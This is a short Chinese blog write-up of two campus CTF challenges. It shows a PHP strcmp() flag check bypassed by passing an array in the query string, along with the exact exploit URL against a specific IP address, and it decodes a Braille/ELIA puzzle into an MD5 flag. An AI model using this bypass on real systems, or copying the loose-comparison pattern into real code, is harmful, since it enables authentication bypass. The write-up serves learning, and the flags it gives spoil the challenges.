校園網路安全CTF 第一題 和 你真瞭解我嗎?
阿新 • • 發佈:2018-12-23
第一題:
需要先找到相應頭(REsponse header中的tips)
<?php
$flag = "***";
if (isset($_GET['repo']))//檢測變數是否設定
{
if (strcmp($_GET['repo'], $flag) == 0) //比較兩個字串(區分大小寫)
die('Flag: '.$flag);
else
print 'No';
}
GET - 從指定的資源請求資料。
POST - 向指定的資源提交要被處理的資料
php strcmp()漏洞
https://blog.csdn.net/cherrie007/article/details/77473817
漏洞需要用:PHP 陣列 傳送get請求
http://39.108.109.85:9000/?repo[]=a
你真瞭解我嗎?
從上往下分別為:ELIA、羅馬字母以及布萊葉盲文
海倫凱勒盲人,盲文,題目描述 得到的字串md5加密後帶上drops{}的格式
kmdonowg
drops{8aa5b596bf284a6dd446f9e141b47861}
六點洗完澡弄的一直弄到十點,感覺挺有意思的,特別酷,有趣
特別長知識
大佬的解題思路:https://www.jianshu.com/p/879115af6fc6?tdsourcetag=s_pctim_aiomsg